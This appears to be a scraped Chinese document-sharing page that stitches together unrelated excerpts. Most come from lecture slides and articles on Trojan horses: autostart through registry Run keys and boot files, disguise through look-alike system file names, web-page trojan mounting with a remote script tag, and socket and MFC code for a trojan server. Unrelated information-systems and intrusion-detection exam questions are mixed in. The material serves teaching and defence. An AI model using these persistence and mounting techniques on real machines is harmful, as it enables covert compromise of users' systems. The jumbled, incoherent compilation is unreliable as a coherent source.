当前位置:文档之家 › 第5章b1 特洛伊木马关键技术

第5章b1 特洛伊木马关键技术

  • 格式:ppt
  • 大小:1.84 MB
  • 文档页数:82

下载文档原格式

  / 82

合集下载

第五章 特洛伊木马

第五章 特洛伊木马


6、隐藏在应用程序的启动配置文件中 木马控制端利用应用程序的启动配置文 件能启动程序的特点,将制作好的带有木 马启动命令的同名文件上传到服务端覆盖 该同名文件,这样就可以达到启动木马的 目的。 7、伪装在普通文件中 具体方法是把可执行文件伪装成图片或 文本。
8、内置到注册表中 木马可以隐藏在注册表中由于系统启动时自动 执行程序的键值中,如: HKEY_LOCAL_MACHINE\software\ HKEY_LOCAL_MACHINE\software\Microsoft \Windows\CurrentVersion下所有以“run”开头的 Windows\CurrentVersion下所有以“run” 键值; HKEY_CURRENT_USER\software\microsoft\ HKEY_CURRENT_USER\software\microsoft\ Windows\CurrentVersion下所有以“run” Windows\CurrentVersion下所有以“run”开头的 键值; HKEY_USERS\.Default\Software\Microsoft\ HKEY_USERS\.Default\Software\Microsoft\Wi ndows\CurrentVersion下所有以“run” ndows\CurrentVersion下所有以“run”开头的键 值。
木马的启动方式
木马想要达到控制或者监视计算机的目的, 必须要运行,自动启动功能是必不可少的, 这样可以保证木马不会因为用户的一次关 机操作而彻底失去作用。常用的方法有以 下几种:
1、集成(捆绑)到应用程序中。 如绑定到系统文件中,那么每次WINDOWS启 如绑定到系统文件中,那么每次WINDOWS启 动均会启动木马。 2、隐藏在Autoexec.bat和Config.sys中 、隐藏在Autoexec.bat和Config.sys中 很多用户一般不处理系统的配置文件,这正好 给木马提供了一个藏身之处,利用配置文件的特殊 作用,木马很容易在计算机中运行。 当你启动dos的时候, 当你启动dos的时候,不执行任何动作,便会看到 一个光标而已,如果你要在dos启动的时候让他自 一个光标而已,如果你要在dos启动的时候让他自 动执行一些命令,那就可以编辑Autoexec.bat, 动执行一些命令,那就可以编辑Autoexec.bat,dos 会自动执行它。你可以在Autoexec.bat里写 会自动执行它。你可以在Autoexec.bat里写 echo hello this is dos command. 那示"hello this is dos command"
特洛伊木马攻击技术与防范策略

特洛伊木马攻击技术与防范策略

特洛伊木马攻击技术与防范策略敬晓芳(中国工程物理研究院化工材料研究所,绵阳629100)摘要:特洛伊木马是一种程序,它驻留在目标计算机里,随计算机自动启动并在某一端口进行侦听,对接收的数据识别后,对目标计算机执行特定的操作。

其隐蔽性强,种类数量繁多,危害性很大。

本文介绍了木马的攻击原理、常用攻击技术以及防范策略。

关键词:特洛伊木马;驻留;攻击技术;防范策略1引言特洛伊木马(Trojan Horse),简称木马,是一种程序,这种程序被包含在合法的或表面上无害的程序上的恶意程序。

其实质只是一个通过端口进行通信的网络客户/服务程序。

木马具有很强的隐蔽性,而且能够自启动,并进行自我保护。

木马属于“外来代码”的范畴,它表面上提供一些令人感兴趣的有用的功能,但除了用户能看到的功能以外,这种程序还通过内嵌的特殊代码执行一些用户所不知道的恶意的功能。

木马的制造者常常是将一些特殊的代码添加到正常的应用程序代码中来实现这些隐藏的特殊的功能。

对攻击者而言,使用外来代码的关键优势之一就是,通过将非本地代码或二进制代码引入操作系统环境,从而断绝与系统或网络管理员所控制资源的依赖性。

相比较而言,添加或修改系统帐户,或直接操纵其他系统资源,可能被警惕性高的管理员发现,而安装一个“外来代码”则可以在一段时间内不被发现,尤其是通过对操作系统做广泛的修改可使其隐蔽性更好。

随着计算机技术的发展,木马的功能越来越强大,隐蔽性和破坏性不断提高,其数量也在急剧增加。

2木马的原理和种类自木马程序诞生至今,己经出现了多种类型,常见的有玩笑型、破坏型、密码发送型、远程访问型、键盘记录型、代理木马、反弹端口型木马等。

大多数的木马都不是单一功能的木马,它们往往是很多种功能的集成品,因此,此处也只能给出一个大致的分类。

(1)玩笑型玩笑木马程序不造成损坏,但会从计算机的扬声器中发出惹人讨厌的声音,让计算机屏幕看起来七扭八歪,或在屏幕上显示吓人的信息,如“现在正在格式化硬盘!”虽然这类木马程序非常气人,让人厌烦,但它们是无害的,很容易删除。

第5章恶意代码

第5章恶意代码

第5章恶意代码第5章恶意代码――欺骗与隐藏何路helu@本章主要内容 5.1 恶意代码概述 5.2 恶意代码攻击模型5.3 特洛伊木马的植入技术 5.4 特洛伊木马的隐藏技术 5.5 特洛伊木马的检测与防范何路计算机网络安全案例20XX年5月4日,一种名为“我爱你”的电脑病毒开始在全球各地迅速传播。

这个病毒是通过Microsoft Out ook电子邮件系统传播的,邮件的主题为“I LOVE YOU”并包含一个附件。

一旦在Microsoft Ou tlook里打开这个邮件,系统就会自动复制并向地址簿中的所有邮件电址发送这个病毒。

计算机网络安全何路案例20XX年1月25日,突如其来的“SQL”蠕虫,不亚于让人们不能忘怀的“9.11”事件。

互联网遭遇到全球性的病毒攻击,此病毒的病毒体极其短小,却具有极强的传播性。

何路计算机网络安全20XX年网络安全事件类型统计何路计算机网络安全不同类别病毒比例图何路计算机网络安全恶意代码定义早期恶意代码的主要形式是计算机病毒。

80年代,计算机病毒被定义为一种在运行过程中可以复制自身的破坏性程序。

90年代末,计算机病毒被定义为,经过存储介质和网络进行传播,从一台计算机系统到另外一台计算机系统,未经授权认证破坏计算机系统完整性的程序或代码何路计算机网络安全恶意代码包括何路计算机病毒(Computer Virus) 特洛伊木马(Trojan Horse) 计算机蠕虫(Worms) 逻辑炸弹(Logic Bombs) 用户级RootKit 内核级RootKit 脚本恶意代码(Malicious scripts) 恶意ActiveX控件其它恶意代码计算机网络安全计算机病毒计算机病毒是指能实现自我复制的程序或可执行代码,这些程序或代码可以破坏计算机的功能或者毁坏数据,影响计算机的正常使用。

计算机病毒一般分为三个部分:初始化部分感染部分功能部分何路计算机网络安全蠕虫网络蠕虫是一种智能化、自动化的攻击程序或代码,它综合了网络攻击、密码学和计算机病毒技术。

特洛伊木马分析

特洛伊木马分析

特洛伊木马分析特洛伊木马分析摘要在计算机如此普及的网络时代,病毒对于我们来说早已不是一个新鲜的名词,而通常被称为木马病毒的特洛伊木马也被广为所知,为了更好的保护自己的电脑我们应该了解跟多有关特洛伊病毒的信息。

本文对该病毒原理、预防和清除进行了详细的阐述,并对此发表了一些个人的看法。

关键词特洛伊木马病毒木马特洛伊木马是一种特殊的程序,它们不感染其他文件,不破坏系统,不自身复制和传播。

在它们身上找不到病毒的特点,但它们们仍然被列为计算机病毒的行列。

它们的名声不如计算机病毒广,但它们的作用却远比病毒大。

利用特洛伊木马,远程用户可以对你的计算机进行任意操作(当然物理的除外),可以利用它们传播病毒,盗取密码,删除文件,破坏系统。

于是这个在网络安全界扮演重要角色,课进行超强功能远程管理的“功臣”,自然而然也被列为受打击的行列。

在网络上,各种各样的特洛伊木马已经多如牛毛,它们和蠕虫病毒、垃圾邮件一起构成了影响网络正常秩序的三大害。

下面我就来说说特洛伊木马的特点、工作原理、预防和清除的方法,以及我自己对木马病毒及其防护方法的一些见解。

一.什么是特洛伊木马特洛伊木马简称木马,英文名为Trojan。

它是一种不同于病毒,但仍有破坏性的程序,普通木马最明显的一个特征就是本身可以被执行,所以一般情况下它们是由.exe文件组成的,某些特殊木马也许还有其他部分,或者只有一个.dll文件。

木马常被用来做远程控制、偷盗密码等活动。

惯用伎俩是想办法让远程主机执行木马程序,或者主动入侵到远程主机,上传木马后再远程执行。

当木马在远程主机被执行后,就等待可控制程序连接,一旦连接成功,就可以对远程主机实施各种木马功能限定内的操作。

功能强大的木马可以在远程主机中做任何事情,就如同在自己的机器上操作一样方便。

可见,木马实际上就是一个具有特定功能的可以里应外合的后门程序,将其与其他的病毒程序结合起来造成的危害将会是相当大的。

二.木马的工作原理当木马程序或藏有木马的程序被执行后,木马首先会在系统中潜伏下来,并会想办法使自己在每次开机时自动加载,以达到长期控制目标的目的。

特洛伊木马原理介绍

特洛伊木马原理介绍

1. 特洛伊木馬程式原理7n一、引言otnpy特洛伊木馬是Trojan Horse 的中譯,是借自"木馬屠城記"中那只木馬的名稱。

古希臘有大軍圍攻特洛伊城,逾年無法攻下。

有人獻計製造一隻高二丈的大木馬假裝作戰馬神,攻擊數天後仍然無功,遂留下木馬拔營而去。

城中得到解圍的消息,及得到"木馬"這個奇異的戰利品,全城飲酒狂歡。

到午夜時份,全城軍民盡入夢鄉,匿於木馬中的將士開暗門垂繩而下,開啟城門及四處縱火,城外伏兵湧入,焚屠特洛伊城。

後世稱這只木馬為"特洛伊木馬",現今電腦術語借用其名,意思是"一經進入,後患無窮"。

特洛伊木馬原則上它和Laplink 、PCanywhere 等程式一樣,只是一種遠端管理工具。

而且本身不帶傷害性,也沒有感染力,所以不能稱之為病毒(也有人稱之為第二代病毒);但卻常常被視之為病毒。

原因是如果有人不當的使用,破壞力可以比病毒更強。

iagavi©摩尼BBS網路社區-- 音樂.歌詞.小遊戲.MTV.桌布.圖庫.笑話.影片.星座.下載.動漫畫.免費留言板申請BBS網路社區-- 音樂.歌詞.小遊戲.MTV.桌布.圖庫.笑話.影片.星座.下載.動漫畫.免費留言板申請E(/I 二、木馬攻擊原理cHt特洛伊木馬是一個程式,它駐留在目標電腦裡,可以隨電腦自動啟動並在某一連接進行偵聽,在對接收的資料識別後,對目標電腦執行特定的****作。

木馬,其實只是一個使用連接進行通訊的網路客戶/伺服器程式。

e2/基本概念:網路客戶/伺服器模式的原理是一台主機提供伺服器(伺服端),另一台主機接受伺服器(客戶端)。

作為伺服端的主機一般會開啟一個預設的連接埠並進行監聽(Listen),如果有客戶端向伺服端的這一連接埠提出連接請求(Connect Request),伺服端上的相對應程式就會自動執行,來回覆客戶端的請求。

對於特洛伊木馬,被控制端就成為一台伺服器。

管理系统信息系统习题(全)

管理系统信息系统习题(全)

第01章作业一、判断题1)开发一个新产品、完成一份订单、聘用一位新员工等均是企业业务流程的例子。

2)完全数字化的公司只提供数字化产品或服务。

3)信息技术是指企业用于支持业务目标的所有硬件,而信息系统包括所有软件和必要的业务流程。

4)信息系统的维度包括管理、组织和信息技术.5)知识工作者是指承担企业所有层面的书面工作的工作者。

6)企业有四个主要的业务职能: 销售和营销、生产和制造、财务和会计,以及信息技术.7)内联网(Intranets)允许企业与第三方供应商方便地协作。

8)一直以来的研究表明,对IT投资较多的企业比投资较少的企业能够获得更多的收益。

9)企业对有效业务流程的投资是对组织互补性资产的一种投资.10)信息系统的行为方法通常不关注技术解决方案,而是分析系统的心理、社会和经济方面的影响。

二、选择题1)信息技术6个重要的业务目标是新产品、新服务和新商业模式;与客户和供应商的密切关系;企业生存;竞争优势;卓越运营;以及()。

A) 改善灵活性B) 改善决策C)改善业务实践D) 改善效率2)企业出于必要性而使用信息系统,体现了哪种业务目标?A)企业生存B)改善业务实践C)竞争优势D)改善灵活性3)以下哪种目标较好地描述了本章讨论的案例--迪斯尼运营指挥中心所实施技术背后的业务战略?A) 卓越运营B) 新产品和新服务C) 竞争优势D)客户支持4)组织利用信息系统中哪三类活动产生的信息来控制运营的?A) 信息检索、研究和分析B)输入、输出和反馈C)输入、处理和输出D)数据分析、处理和反馈5)被公司大多数员工所接受的一组基本的假设、价值观和做事方式称为A) 文化B)环境C)氛围D)价值观6) 企业利用信息系统创造新的产品和服务的一个例子是A) 沃尔玛的零售链(RetailLink)系统B) 文华东方(Mandarin Oriental)酒店的客户偏好追踪系统C)威瑞森电信(Verizon)公司基于Web的数字仪表板D)苹果公司的 iPod7) 企业利用信息系统与客户和供应商建立密切关系的一个例子是A) 沃尔玛的零售链(RetailLink)系统B) 文华东方(Mandarin Oriental)酒店的客户偏好追踪系统C)威瑞森电信(Verizon)公司基于Web的数字仪表板D) 苹果公司的 iPod8) 保持组织的财务记录是哪个主要业务职能部门的核心目的?A)制造和会计B)财务和会计C)销售和制造D)财务和销售。

连云港信息技术安全答案

连云港信息技术安全答案

一 判断题1501 通用入侵检测框架(CIDF)模型中,____的目的是从整个计算环境中获得事件,并向系统的其他部分提供此事件.A 事件产生器B 事件分析器C 事件数据库D 响应单元 1502基于网络的入侵检测系统的信息源是____。

A 系统的审计日志B 系统的行为数据C 应用程序的事务日志文件 D 网络中的数据包1503 误用入侵检测技术的核心问题是____的建立以及后期的维护和更新。

A 异常模型B 规则集处理引擎C 网络攻击特征库D 审计日志 1504 ____是在蜜罐技术上逐步发展起来的一个新的概念,在其中可以部署一个或者多个蜜罐,来构成一个黑客诱捕网络体系架构。

A 蜜网B 鸟饵C 鸟巢D 玻璃鱼缸 1505下面关于响应的说法正确的是____。

A 主动响应和被动响应是相互对立的,不能同时采用B 被动响应是入侵检测系统中的唯一响应方式C 入侵检测系统提供的警报方式只能是显示在屏幕上的警告信息或窗口 D 主动响应的方式可以是自动发送邮件给入侵发起方的系统管理员请求协助以识别问题和处理问题1506下面说法错误的是____。

A 由于基于主机的入侵检测系统可以监视一个主机上发生的全部事件,它们能够检测基于网络的入侵检测系统不能检测的攻击B 基于主机的入侵检测可以运行在交换网络中 C 基于主机的入侵检测系统可以检测针对网络中所有主机的网络扫描 D 基于应用的入侵检测系统比起基于主机的入侵检测系统更容易受到攻击,因为应用程序日志并不像操作系统审计追踪日志那样被很好地保护1507使用漏洞库匹配的扫描方法,能发现____。

A 未知的漏洞 B 已知的漏洞 C 自行设计的软件中的漏洞D 所有漏洞1508下面____不可能存在于基于网络的漏洞扫描器中。

A 漏洞数据库模块B 扫描引擎模块C 当前活动的扫描知识库模块 D 阻断规则设置模块1509网络隔离技术,根据公认的说法,迄今已经发展了____个阶段。

A 六B 五C 四D 三 1510下面关于隔离网闸的说法,正确的是____。

特洛伊木马

特洛伊木马


概述
特洛伊木马(简称木马)是隐藏在系统中的用以完成未授权功能的非法程序,是黑客常用的一种攻击工具,它 伪装成合法程序,植入系统,对计算机络安全构成严重威胁。区别于其他恶意代码,木马不以感染其它程序为目 的,一般也不使用络进行主动复制传播。
特洛伊木马是基于C/S(客户/服务器)结构的远程控制程序,是一类隐藏在合法程序中的恶意代码,这些代码 或者执行恶意行为,或者为非授权访问系统的特权功能而提供后门。通常,使用木马的过程大致分两步首先,把 木马的服务器端程序通过络远程植入受控机器,然后通过安装程序或者启动机制使木马程序在受控的机器内运行。 一旦木马成功植入,就形成了基于C/S结构的控制架构体系,服务端程序位于受控机器端,客户端程序位于控制 机器端。
5、时效性越来越强,挖矿木马团伙在利益的驱使下,往往会不断集成更有效的1/N D ay漏洞来感染更多 主机资源,从而获取更多的收益。
感谢观看
功能
只要在本地计算机上能操作的功能,现如今的木马基本上都能实现。木马的控制端可以像本地用户一样操作 远程计算机。木马的功能可以概括为以下内容。
1、窃取用户文件。 特洛伊木马在目标计算机中潜伏,当遇到感兴趣的文件时就会将相关文件传输给提前设定的目的地而不会被 用户发现。 2、接受木马释放者的指令。 特洛伊木马一旦感染互联中的服务器就会窃取较高权限,随意地控制和监视通过该服务器的数据和账户。 3、篡改文件和数据。 根据指令对系统文件和数据进行修改,使目标计算机的数据和文件产生错误,导致作出错误的决策。 4、删除文件和数据。 将目标计算机操作系统中的文件和数据随意地删除。 5、施放病毒。
3、端口
一台机器有个端口,你会注意这么多端口么?而木马就很注意你的端口。如果你稍微留意一下,不难发现,大 多数木马使用的端口在1024以上,而且呈越来越大的趋势。当然也有占用1024以下端口的木马,但这些端口是常 用端口,占用这些端口可能会造成系统不正常,这样的话,木马就会很容易暴露。
特洛伊木马

特洛伊木马


网络钓鱼挂马
网络中最常见的欺骗手段,黑客们利用人们的猎 奇、贪心等心理伪装构造一个链接或者一个网页, 利用社会工程学欺骗方法,引诱点击,当用户打 开一个看似正常的页面时,网页代码随之运行, 隐蔽性极高。
伪装挂马
高级欺骗,黑客利用IE或者Fixfox浏览器的设计 缺陷制造的一种高级欺骗技术,当用户访问木马 页面时地址栏显示或者 等用户信任地址,其实却 打开了被挂马的页面,从而实现欺骗。
• 第四阶段在进程隐藏方面做了非常大的改动,采用了 内核插入式的嵌入方式,利用远程插入线程技术嵌入 DLL线程,或者挂接PSAPI实现木马程序的隐藏。即 使在Windows NT/2K下,这些技术都达到了良好的隐 藏效果。
• 相信,第五代木马的技术更加先进。
木马的关键技术
——植入技术
植入技术
升级植入:打补丁是目前内核及功能升级重要途 径。由于升级包发布途径不严格且非常复杂,因 此,这将成为传播木马的一个有效途径。 网站(网页)植入:网站挂马是传播木马的最佳 途径之一。把木马连接潜入到网站上,当用户访 问该网站时,把木马自动种植到用户的计算机上。 在辅助以附加手段的前提下,该方法也可以实现 定点植入。 漏洞植入:木马通过操作系统的漏洞直接传播给 计算机,其中间桥梁是诸如局域网、Internet、 WiFi、蓝牙、红外等网络连接。
木马检测、清除、防范
• 关键技术、实用工具、防范
怎样才能使计算机更安全?
木马的介绍
概念
特洛伊木马(Trojan Horse) :是一种与远程计算 机之间建立起连接,使远程计算机能够通过网络 控制用户计算机系统并且可能造成用户的信息损 失、系统损坏甚至瘫痪的程序。
木马的组成
硬件:控制端、服务端、Internet 软件:控制端程序、木马程序、木马配置程序 连接:控制、服务端IP, 控制、服务端Port
特洛伊木马

特洛伊木马

的建立
• 木马通道与远程控制
– 木马连接建立后,控制端端口和服务端木马端口之间将会出现一 条通道 – 控制端上的控制端程序可藉这条通道与服务端上的木马程序取得 联系,并通过木马程序对服务端进行远程控制,实现的远程控制 就如同本地操作
控制端 控制端 程序 1096 6267 服务端 木马 程序 窃取密码 文件操作 修改注册表 系统操作
32
网页挂马技术(二)
• js调用型网页挂马
– 利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术
<script language=javascript
src=/gm.js></script>
/gm.js就是一个js脚本文件,通过它调用和执行木 马的服务端。这些js文件一般都可以通过工具生成,攻击者只需输入相关 的选项就可以了
5
木马入侵基本过程
控制端 ①配置木马 ②传播木马 ③运行木马 Internet 木马 服务端
④信息反馈
信息
⑤建立连接
⑥远程控制
6
netstat查看木马打开的端口
Proto ① TCP ② TCP Local Address 202.102.47.56 : 6267 202.102.47.56 : 6267 服务端 IP地址 木马 端口 Foreign Address 202.96.96.102 : 1096 0.0.0.0 控制端 IP地址 控制端 端口 State ESTABLISHED LISTENING 连接状态: ①连接已建立 ②等待连接
33
网页挂马技术(三)
• 图片伪装挂马
– 攻击者直接将网页木马加载到图片中
/test.htm中的木马代码植入到test.jpg图片文件中
第5章 特洛伊木马

第5章 特洛伊木马

阻塞,等待客户数据
bind( )
服务请求 sendto( )
处理服务请求
sendto( ) close( )
服务应答
readfrom( ) close( )
无连接套接应用程序时序图
服务器
socket( ) bind( ) listen( )
客户机
accept( )
阻塞,等待客户数据
socket( )
恶意代码与计算机病毒 -原理、技术和实践
技术进展
历史上概括为4个阶段: − 第四阶段在进程隐藏方面做了非常大的改动, 采用了内核插入式的嵌入方式,利用远程插入 线程技术嵌入DLL线程,或者挂接PSAPI实现木 马程序的隐藏。即使在Windows NT/2K下, 这些技术都达到了良好的隐藏效果。 − 相信,第五代木马的技术更加先进。
恶意代码与计算机病毒 -原理、技术和实践
Server端功能——实现list命令

CFileFind finder; BOOL bWorking = finder.FindFile("*.*"); while (bWorking) //循环得到下一层文件或目录 { bWorking = finder.FindNextFile(); if ( finder.IsDots() || finder.IsDirectory() ){ strResult = "Dire: "; }else{ strResult = "File: "; } strResult += finder.GetFileName(); strResult += "\n"; } SendText( strResult, pSocket ); //返回Return_Text变量的内容

特洛伊木马原理分析

特洛伊⽊马原理分析特洛伊⽊马是如何⼯作的 ⼀般的⽊马程序都包括客户端和服务端两个程序,其中客户端是⽤于攻击者远程控制植⼊⽊马的机器,服务器端程序即是⽊马程序他所做的第⼀步是要把⽊马的服务器端。

攻击者要通过⽊马攻击你的系统,程序植⼊到你的电脑⾥⾯。

⽬前⽊马⼊侵的主要途径还是先通过⼀定的⽅法把⽊马执⾏⽂件弄到被攻击者的电脑系统⾥,利⽤的途径有邮件附件、下载软件中等,然后通过⼀定的提⽰故意误导被攻击者打开执⾏⽂件,⽐如故意谎称这个⽊马执⾏⽂件,是你朋友送给你贺卡,可能你打开这个⽂件后,确实有贺卡的画⾯出现,但这时可能⽊马已经悄悄在你的后台运⾏了。

⼀般的⽊马执⾏⽂件⾮常⼩,⼤部分都是⼏K到⼏⼗K,如果把⽊马捆绑到其他正常⽂件上,你很难发现,所以,有⼀些⽹站提供的软件下载往往是捆绑了⽊马⽂件的,你执⾏这些下载的⽂件,也同时运⾏了⽊马。

⽊马也可以通过Script、ActiveX及Asp.CGI交互脚本的⽅式植⼊,由于微软的浏览器在执⾏Senipt脚本存在⼀些漏洞。

攻击者可以利⽤这些漏洞传播病毒和⽊马,甚⾄直接对浏览者电脑进⾏⽂件操作等控制。

前不久献出现⼀个利⽤微软Scripts脚本漏洞对浏览者硬盘进⾏格式化的HTML页⾯。

如果攻击者有办法把⽊马执⾏⽂件下载到攻击主机的⼀个可执⾏WWW⽬录夹⾥⾯,他可以通过编制CGI程序在攻击主机上执⾏⽊马⽬录。

此外,⽊马还可以利⽤系统的⼀些漏洞进⾏植⼈,如微软著名的US服务器溢出漏洞,通过⼀个IISHACK攻击程序即可使IIS服务器崩溃,并且同时攻击服务器,执⾏远程⽊马执⾏⽂件。

当服务端程序在被感染的机器上成功运⾏以后,攻击者就可以使⽤客户端与服务端建⽴连接,并进⼀步控制被感染的机器。

在客户端和服务端通信协议的选择上,绝⼤多数⽊马使⽤的是TCP/IP协议,但是也有⼀些⽊马由于特殊的原因,使⽤UDP协议进⾏通讯。

当服务端在被感染机器上运⾏以后,它⼀⽅⾯尽量把⾃⼰隐藏在计算机的某个⾓落⾥⾯,以防被⽤户发现;同时监听某个特定的端⼝,等待客户端与其取得连接;另外为了下次重启计算机时仍然能正常⼯作。

特洛伊木马攻防介绍

特洛伊⽊马攻防介绍 ⽊马程序⽤“瞒天过海”或“披着⽺⽪的狼”之类的词来形容这类程序⼀点也不为过,直截了当的说法是⽊马有两个程序,⼀个是服务器程序,⼀个是控制器程序,当你的电脑运⾏了服务器程序后下⾯由店铺给你做出详细的特洛伊密码攻防介绍!希望对你有帮助! 特洛伊⽊马攻防介绍: 特洛伊⽊马是什么: ⼀个⽊马要⼯作,那麽其服务器程序必须在⽬标上运⾏,没有⼈会主动要求去运⾏它,但是会有这麽⼀天,有⼈对你抱以和善的微笑说,"我这有⼀个好游戏""我有漂亮的MM屏保和你分享⼀下"等等,当你打开这些所谓的程序时,⼀个宿主程序已经悄悄潜⼊你的机⼦,第⼀步就这样完成了,这完全是我们疏于防范造成的. 然后,⽊马⼀般会在以下三个地⽅安营扎寨:注册表、win.ini、system.ini,因为电脑启动的时候,需要装载这三个⽂件,⼤部分⽊马是使⽤这三种⽅式启动的.也有捆绑⽅式启动的,⽊马phAse 1.0版本和NetBus 1.53版本就可以以捆绑⽅式装到⽬标电脑上,可以捆绑到启动程序上,也可以捆绑到⼀般程序的常⽤程序上.如果捆绑到⼀般的程序上,启动是不确定的,这要看⽬标电脑主⼈了,如果他不运⾏,⽊马就不会进⼊内存.捆绑⽅式是⼀种⼿动的安装⽅式,⼀般捆绑的是⾮⾃动⽅式启动的⽊马.⾮捆绑⽅式的⽊马因为会在注册表等位置留下痕迹,所以,很容易被发现,⽽捆绑⽊马可以由⿊客⾃⼰确定捆绑⽅式、捆绑位置、捆绑程序等,位置的多变使⽊马由很强的隐蔽性. ⽊马的服务器程序⽂件⼀般位置是在c:\windows和c:\windows\system中,为什么要在这两个⽬录下,因为windows的⼀些系统⽂件在这两个位置,如果你误删了⽂件,你的电脑可能崩溃,你不得不重新安装系统. ⽊马的⽂件名更是⼀种学问,⽊马的⽂件名尽量和windows的系统⽂件接近,这样你就会弄糊涂了,⽐如⽊马SubSeven 1.7版本的服务器⽂件名是c:\windows\KERNEL16.DL,⽽windows由⼀个系统⽂件是c:\windows\KERNEL32.DLL,他们之差⼀点点,但是删错了的话,结果可⼤不相同的哦,删除KERNEL32.DLL会让你死翘翘的哦.再⽐如,⽊马phAse 1.0版本,⽣成的⽊马是C:\WINDOWS\System\Msgsrv32.exe,愣是和windows的系统⽂件C:\WINDOWS\System\Msgsrv32.exe⼀模⼀样,只是图标有点两样,你可不要删错了哦.上⾯两个是假扮系统⽂件的类型,我们再来看看⽆中⽣有的类型,⽊马SubSeven 1.5版本服务器⽂件名是c:\windows\window.exe,看清楚了哦,少⼀个s的哦,如果不告诉你这是⽊马,你有胆⼦删吗? 但是⽊马有⼀个致命的缺点,相对固定的端⼝,⿊客要进⼊你的电脑,必须要有通往你电脑的途径,也就是说,⽊马必须打开某个端⼝,⼤家叫这个端⼝为“后门”,⽊马也叫“后门⼯具”.这个不得不打开的后门是很难隐蔽的,只能采取混淆的办法,很多⽊马的端⼝是固定的,让⼈⼀眼就能看出是什么样的⽊马造成的.所以,端⼝号可以改变,这是⼀种混淆的办法.我们知道7306是⽊马netspy的,⽊马SUB7可以改变端⼝号,SUB7默认的端⼝是1243,但是如果把1243端⼝改成了7306呢,呵呵,⼀定会把⽬标电脑的主⼈弄混淆了.有些⼈会问,要是这个端⼝会⾃动改变那该多好呀,每次上⽹端⼝号⾃动改变,呵呵,真聪明,可惜聪明过头了.⽐如,真有这样的⽊马装在我的电脑上,每次上⽹的端⼝均会改变,你是⿊客,你打算怎么进⼊我的电脑呢?你知道这个⽊马现在开放的端⼝号是多少吗?想扫描我的电脑?端⼝⼀共有6万多个,你什么时候扫描完毕?半个⼩时,呵呵,我早发现了,早把你炸死了.即使我是菜鸟⼀个,你这样⾼速度扫描我的电脑,也会导致我的电脑通讯阻塞,谁会在⽹速⾮常慢的情况下在⽹络上待半个⼩时?所以,这基本上是不太可能的事情. ⽊马有很强的隐蔽性,在WINDOWS中,如果某个程序出现异常,⽤正常的⼿段不能退出的时候,采取的办法时按“Ctrl+Alt+Del"键,跳出⼀个窗⼝,找到需要终⽌的程序,然后关闭它.早期的⽊马会在按“Ctrl+Alt+Del"显露出来,现在⼤多数⽊马已经看不到了.所以只能采⽤内存⼯具来看内存中时候存在⽊马. ⽊马还具有很强潜伏的能⼒,表⾯上的⽊马被发现并删除以后,后备的⽊马在⼀定的条件下会跳出来.这种条件主要是⽬标电脑主⼈的操作造成的.我们先来看⼀个典型的例⼦:⽊马Glacier(冰河1.2正式版)现在已经升级到3.0版, 这个⽊马有两个服务器程序,C:\WINDOWS\SYSTEM\Kernel32.exe挂在注册表的启动组中,当电脑启动的时候,会装⼊内存,这是表⾯上的⽊马.另⼀个是C:\WINDOWS\SYSTEM\Sysexplr.exe,也在注册表中,它修改了⽂本⽂件的关联,当你点击⽂本⽂件的时候,它就启动了,它会检查Kernel32.exe是不是存在,如果存在的话,什么事情也不做.当表⾯上的⽊马Kernel32.exe被发现并删除以后,⽬标电脑的主⼈可能会觉得⾃⼰已经删除⽊马了,应该是安全的了.如果⽬标电脑的主⼈在以后的⽇⼦中点击了⽂本⽂件,那么这个⽂件⽂件照样运⾏,⽽Sysexplr.exe被启动了.Sysexplr.exe会发现表⾯上的⽊马Kernel32.exe已经被删除,就会再⽣成⼀个Kernel32.exe,于是,⽬标电脑以后每次启动电脑⽊马⼜被装上了. 说了这麽多,是不是感到很恐怖,很上⽕,别着急,清凉解暑药马上就到. 特洛伊密码攻防办法: 特洛伊密码攻防办法1.必须提⾼防范意识,不要打开陌⽣⼈信中的附件,哪怕他说的天花乱坠,熟⼈的也要确认⼀下来信的原地址是否合法. 特洛伊密码攻防办法2.多读readme.txt.许多⼈出于研究⽬的下载了⼀些特洛伊⽊马程序的软件包,在没有弄清软件包中⼏个程序的具体功能前,就匆匆地执⾏其中的程序,这样往往就错误地执⾏了服务器端程序⽽使⽤户的计算机成为了特洛伊⽊马的牺牲品.软件包中经常附带的readme.txt⽂件会有程序的详细功能介绍和使⽤说明,尽管它⼀般是英⽂的,但还是有必要先阅读⼀下,如果实在读不懂,那最好不要执⾏任何程序,丢弃软件包当然是最保险的了.有必要养成在使⽤任何程序前先读readme.txt的好习惯. 值得⼀提的是,有许多程序说明做成可执⾏的readme.exe形式,readme.exe往往捆绑有病毒或特洛伊⽊马程序,或者⼲脆就是由病毒程序、特洛伊⽊马的服务器端程序改名⽽得到的,⽬的就是让⽤户误以为是程序说明⽂件去执⾏它,可谓⽤⼼险恶.所以从互联⽹上得来的readme.exe最好不要执⾏它. 特洛伊密码攻防办法3.使⽤杀毒软件.现在国内的杀毒软件都推出了清除某些特洛伊⽊马的功能,如KV300、KILL98、瑞星等等,可以不定期地在脱机的情况下进⾏检查和清除.另外,有的杀毒软件还提供⽹络实时监控功能,这⼀功能可以在⿊客从远端执⾏⽤户机器上的⽂件时,提供报警或让执⾏失败,使⿊客向⽤户机器上载可执⾏⽂件后⽆法正确执⾏,从⽽避免了进⼀步的损失,但是要记住,它不是万能的. 特洛伊密码攻防办法4.⽴即挂断.尽管造成上⽹速度突然变慢的原因有很多,但有理由怀疑这是由特洛伊⽊马造成的,当⼊侵者使⽤特洛伊的客户端程序访问你的机器时,会与你的正常访问抢占宽带,特别是当⼊侵者从远端下载⽤户硬盘上的⽂件时,正常访问会变得奇慢⽆⽐.这时,你可以双击任务栏右下⾓的连接图标,仔细观察⼀下“已发送字节”项,如果数字变化成1~3kbps(每秒1~3千字节),⼏乎可以确认有⼈在下载你的硬盘⽂件,除⾮你正在使⽤ftp功能.对TCP/IP端⼝熟悉的⽤户,可以在“MS-DOS⽅式”下键⼊“netstat-a"来观察与你机器相连的当前所有通信进程,当有具体的IP正使⽤不常见的端⼝(⼀般⼤于1024)与你通信时,这⼀端⼝很可能就是特洛伊⽊马的通信端⼝.当发现上述可疑迹象后,你所能做的就是:⽴即挂断,然后对硬盘有⽆特洛伊⽊马进⾏认真的检查. 